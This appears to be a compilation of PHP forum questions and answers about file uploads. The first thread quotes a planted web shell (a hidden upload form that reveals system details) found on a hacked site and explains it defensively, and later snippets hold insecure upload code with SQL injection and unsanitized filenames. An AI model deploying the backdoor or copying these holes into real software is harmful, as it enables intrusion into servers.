I just found some php file on my hosting, with a 0.01% knowledge in php, can someone please explain me what this code do?
<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(#copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
Code Breakdown:
if the variable in the query string has a value (ie. index.php?ourzr=set)
<?php
if(isset($_GET["ourzr"])){
Then display information about your servers operating system using the function php_uname() They use this information to target the next round of hacks to your system specifics.
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
Create an html form that allows more hack files to be uploaded
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
If a file has been uploaded, copy the files from the temp folder to a normal folder without the temp name but the original name
if($_POST["v"]==up){
if(#copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>sucess</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>failed</b>";
}
}
}
?>
This part just is a little mesage saying "I'm a kool script kiddie from the gangsters crew"
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}
Conclusion:
DELETE THIS FILE ASAP
This script was somehow uploaded to your server through some vulnerability that likely still exists (Unless the hacker was nice enough to fix it for you).
They found away to get this one file on your server somewhere they can access it, now they want to use it to continue to upload scripts and other malicious data. Delete this file, and look in to securing anywhere your site uploads files of any kind.
Next Steps:
Read about how hackers use file uploads to upload scripts like these, and other things they can do with their own upload form:
https://www.acunetix.com/websitesecurity/upload-forms-threat/
Read up on how to create a secure upload script: There are many other tutorials
Read more about security, and try to learn a little php. Let me know if you have any more specific questions
Hunt down this guy I guess: https://twitter.com/d3b_x
Related
I want my form to check if the file name equals the users name, in principle everything works fine how I tested it, but the problem I'm having is that the spell check includes the format letters of the image, thus giving a non match.
Example:
Username tries to upload a picture which is correctly named Username.png
The system would work fine, but it takes into account the .png as well, thus gives out a non match. Is there a way I could try and exclude the image format name from the if statement? Because that is pretty much the only problem I'm having with my function, I tried renaming myself to Username.png and then the form works great, but in practice nobody will use such a weird username lol. I'm sorry if my question is a bit confusing or too long, hope it is as clear as I think it is. I will include my small snippet of code here:
if ( ($_FILES["fileToUpload"]["name"]) != $ir['username'] )
{
echo "Sorry, your file is not correctly named.";
$uploadOk = 0;
}
I tried adding a .png after the $ir['username'] like so: $ir['username'].png but then the form just gives out a critical error, so I assume this is a bad spot to write it in. Is there a better way I could do this and is there a way at all? Maybe I could make the form not show up the .png for example? I'm unsure how I could handle this at this point, any input would be invaluable. Thank you for your time, have a good day!
Edit: I will include the form itself as well:
<form action='upload.php' method='post' enctype='multipart/form-data'>
Select image to upload:
<input type='file' name='fileToUpload' id='fileToUpload'><br>
<input type='submit' value='Upload Picture' name='submit'>
</form>
There are several ways of doing that.
The easiest is to split your filename on ., remove the last one and glue it again.
$filename = explode('.', $_FILES["fileToUpload"]["name"]);
array_pop($filename);
$filemame = implode('.', $filename);
I'm working on a small, user-maintained online store, and am trying to allow my end user (the store administrator) to upload graphics for products. When I run this script, however, it doesn't actually store the image. I built this script from various tips here and a tutorial, and have gotten everything but the image upload portion to work.
// Set the image target directory here
$target = "itemImages/";
$target = $target . basename($_FILES["image"]["name"]);
// Variables get POSTed here - just tack new ones on at the end.
// Various POSTs omitted for brevity
$pic=($_FILES["image"]["name"]);
// Places the picture in the folder
if(move_uploaded_file($_FILES["image"]['tmp_name'], "itemImages/"))
{
echo "The file " . basename($_FILES['uploadedfile']["name"]) . " has been uploaded.<br />";
}else {
echo "There was an issue adding this item. Please try again.<br />";
}
// Writes variables to the database
mysql_query("INSERT INTO tbl_item (itemNAME,itemDESC,itemCOST,itemHCOL,itemHSIZ,itemIMG)
VALUES ('$itemName','$itemDesc','$itemCost','$hasColor','$hasSize','$pic')");
mysql_close($con);
?>
Any help, tips, advice, insight, etc. would be very much appreciated.
move_uploaded_files requires a filename as its target. It does not blindly move to a directory, so
move_uploaded_files($_FILES..., 'somedir/somefile.txt');
works, but
move_uploaded_file($_FILES..., 'somedir/');
will not.
Plus, note that your database operation is vulnerable to SQL injection attacks. You're blindly inserting the uploaded file's remote name (['name'] via $pic), and that name is fully under the remote user's control.
Make sure the itemImages folder has write permission by the user your web server (e.g. Apache) is running as (e.g. www-data)
make sure the .php file and the folder you are writing to have the same "owner". Or try setting permissions on the itemImages folder to 777 (This is not recommended, just a debug tactic)
I've searched SO for answers to this feature I desire, but what I need is somewhat unique?
I've got an input element, I type in the name of a sub-folder, hit submit, and a list of the image names within that specified folder is generated via PHP or other. This is local, nothing fancy.
<form action="Make_List.php" method="post">
<input type=text name="location"/>
<input type=submit/>
</form>
<div id="List_Generated"> //desired output.
<span>A.jpg</span>
<span>B.jpg</span>
<span>C.jpg</span>
<span>D.png</span>
</div>
I have no idea what to put in Make_List.php, or if it'll even work locally. I did find this online:
//path to directory to scan
$directory = "../images/team/harry/" ( + sub-folder name );
//get all image files with a .jpg extension.
$images = glob($directory . "*.jpg");
//print each file name
foreach($images as $image)
{
echo $image;
}
But Firefox doesn't know what to do, it asks me to open or save the .php file. Some similar questions on SO (the local part) imply that I don't need PHP for this?
Any tips or pointers would be helpful.
PHP needs a server environment to be processed. You can run a server locally on your own computer. Google installing apache + php. If you have hosting that supports the PHP language you can test your code there.
Your web browser does not run PHP code. An interpreter runs the scripts and their are modules to plug the PHP interpreter into an http server ie apache. Apache will then run the code and return the results if it is instructed to process the .php with a certain module through its configuration.
Use
//path to directory to scan
$directory = "full/path/to/images/team/harry/" . $_POST['location'];
foreach (glob($directory."*.jpg") as $filename) {
echo $filename;
}
Here is a better example for you to work with, no need to type a subdir:
<?php
//Get subfolder list
$folders = glob('../images/team/harry/*',GLOB_ONLYDIR);
?>
<form action="" method="post">
<select name="location" onchange="javascript:this.form.submit()">
<option>-Choose Subdir-</option>
<?php
foreach($folders as $folder){
echo '<option value="'.basename($folder).'">'.basename($folder).'</option>'.PHP_EOL;
}
?>
</select>
</form>
<?php
//List of files once post was submitted
if(isset($_POST['location'])){
echo '<div id="List_Generated">';
$files = glob('../images/team/harry/'.basename($_POST['location']).'/*.jpg');
foreach($files as $file){
echo '<span>'.basename($file).'</span>'.PHP_EOL;
}
echo '</div>';
}
?>
Yes, this sort of thing can be done but with limitations as follows:
Must use HTML5 (doctype and markup).
Google Chrome only (for now)
Application-specific "sandbox" area only, not your general file system.
Realistically, you are thus limited to your computer(s) or those in an intranet where each computer's environment is controlled; not the internet at large.
I'm not an expert but here's a good introduction. You need to read at least the Intro and the section entitled "Reading a directory's contents".
I have a form with the possibility to upload an image from the computer to a server, but it won't work. I don't get any error message, so that's quite annoying. (First I got permission denied, but that was solved by changing the rights), but now when I submit the form, everything goes normally, but the file isn't copied to the destination folder. (The folder exists: I tried it with file_exist()...)
Here's part of the code:
<form action='/changingfruit/index.php?item=bad' name='form' method='post' enctype='multipart/form-data'>
<tr>
<td><input type='text' name='titel_nl' value="titel nl" /><br/><input type='text' name='titel_fr' value="titel fr"/></td>
<td><input type='file' name='text_nl' id='text_nl' accept="image/*"/><br/><input type='file' name='text_fr' id="test_fr" accept="image/*"/></td>
<td class="vTop"><input type="submit" value="Bewaar"/></td>
</tr>
</form>
Part where the values are being send to the db:
$str_titel_nl = $_POST["titel_nl"];
$str_titel_fr = $_POST["titel_fr"];
$str_text_nl = $_FILES["text_nl"]["name"];
$str_text_fr = $_FILES["text_fr"]["name"];
if(!empty($_FILES["text_nl"]["name"])){
$tmp = $_FILES['text_nl']['tmp_name'] ;
$foto = $_FILES['text_nl']['name'] ;
$copied = copy($tmp, $images_nl.$foto);
unlink($tmp);
}
(of course the above is just a part of the code: but it's this part that wont work:
if(!empty($_FILES["text_nl"]["name"])){
$tmp = $_FILES['text_nl']['tmp_name'] ;
$foto = $_FILES['text_nl']['name'] ;
$copied = copy($tmp, $images_nl.$foto);
unlink($tmp);
}
The code below this part also works fine, so no error, but also no image.
Does someone knows where the problem could be?
Thanks so much in advance!
FOUND THE ANSWER
So it was indeed a permission problem. Everything was 777, but the last folder where the image was put had 755. (/fruits/img/2012/thumb/) the thumb was 755.I just overlooked it. Thanks everyone for the help!
Your upload code is very messy. Instead of using copy you should be using move_uploaded_file, and also validate that it actually worked and then perform whatever actions needed.
I'm also not sure why each of your line is starts with <?php and ends with ?> ?
You can write it all as one block instead, and i think it would also make more sense and would make your code cleaner for sure.
Last thing i would recommend is reading "Handling File Uploads" from the PHP Manual. It might shed some light on the problems you're having.
P.S. Try adding on top ini_set("display_errors","On"); error_reporting(E_ALL); and see if you're getting any error messages.
please have a look on below link.
PHP upload file to web server from form. error message
http://patelmilap.wordpress.com/2012/01/30/php-file-upload/
you can try this
$flag = #copy($temp, $move);
if ( $flag === true )
{
print "Uploaded";
}
I have posted a simple solution for file uploading without worrying about the implementation .
Click to see the thread
image uploading issue in codeigniter 2.1.0
Please read this section
in that $uploader->getMessage(); will return error string related to the upload failure . So you can understand why the uploading failed .
Thanks
So im here trying to learn more php and... trying to add an image that a user would upload(an avatar) to the server via move_uploaded_file...oh and im on WAMP right now fyi.
the book im reading ...long story short, the example shown doesnt work. Ive Googled around and literally copy pasted a few relavant examples ive found and still....well to be clear, be it that i wrote it or from the net, i can upload the image name (along with other values) to tables on the db i have set up but the image itself doesn't move to the directory I've set up for it.
I've stripped all my apps code to a simple table and simple php to make sure nothing was conflicting etc, and still nada.
here is my html:
<form method="post" action="testUpload.php" enctype="multipart/form-data">
<input type="hidden" name="MAX_FILE_SIZE" value="32768" >
<table summary="guitarwars lesson" width="500">
<tr>
<td>load picture:</td>
<td><input type="file" name="screenshot" id="screenshot" ></td>
</tr>
<tr>
<td><input type="submit" name="submit" action="submit"></td>
</tr>
</table>
</form>
here is my php:
<?php
$screenshot = $_FILES['screenshot']['name'];
//$destination = "images/user_avatars/$screenshot";
$insertValues = "INSERT INTO testdb(screenshot) VALUES ('$screenshot')";
//---declare connection.
$connect2db = mysqli_connect('127.0.0.1','root','pass','dbname');
if(!$connect2db){
die("Sorry but theres a connection to database error" . mysqli_error);
} else {
//pg intro mssg
echo ' <span style="font-size:25px; color:green;"> --- Link Established with Database ---.<span/><br/><br/>';
}
// put into db.
if(!empty($screenshot)) {
$insertData = mysqli_query($connect2db, $insertValues);
echo 'data submitted. thank you';
move_uploaded_file ($_FILES['screenshot']['tmp_name'],"images/user_avatars/{$screenshot}");
echo 'IMAGE UPLOAD COMPLETE';
}
mysqli_close($connect2db);
?>
now i dont get an error...i actually get the echo "image upload complete" part...
and like i said, with the app code, i get multiple values AND the image name going through and being saved onto the db, but the image itself being moved from temp to my location is a no go.
any tips links, etc i gladly appreciate.
Thank you in advance.
If that's code from your book, then throw the book out and burn it as fast as you can.
a) You're wide open to SQL injection attacks. Any decent PHP tutorial that shows how to deal with databases should START with sql injection attack mitigation strategies.
b) Your connection-failed error uses mysqli_error, which is an undefined constant. You probably want mysqli_error(), which is a function call
c) The code assumes the upload completed successfully. Uploads can/will fail at the drop of a hat, so NOT checking for errors is the fast road to hair-pulling. At minimum the script should have something like
if ($_FILES['screenshot']['error'] !== UPLOAD_ERR_OK) {
die("Upload failed with error code " . $_FILES['screenshot']['error']);
}
Those error codes are defined here.
d) Your code is using the user-supplied filename to store the file onto the sever. Nothing says that a malicious user can't hack the filename to include path information, so your code is actually allowing that nasty user to scribble on ANY file on your server which the webserver process has write access to. This is BAD
e) Your code also assumes the file move succeeded, without checking for errors. It should have at mininum
$status = move_uploaded_file(...);
if (!$status) {
die("Move failed!");
}
or something similar.
f) Your code assumes that all the database queries succeeded. Even if your query string is 100% perfectly formed (yours aren't, see (a) above), queries can fail for any number of other reasons. At bare mininum you should have:
$result = mysql_query(...) or die(mysqli_error());
As a start you could add
if(!move_uploaded_file(...))
die('error');
if you replace
move_uploaded_file ($_FILES['screenshot']['tmp_name'],"images/user_avatars/{$screenshot}");
echo 'IMAGE UPLOAD COMPLETE';
with
if (move_uploaded_file ($_FILES['screenshot']['tmp_name'],"images/user_avatars/{$screenshot}")) {
echo 'IMAGE UPLOAD COMPLETE';
}
you would then get the echo if it was successful
Try to supply the absolute path:
move_uploaded_file ($_FILES['screenshot']['tmp_name'],"/path/to/images/user_avatars/{$screenshot}");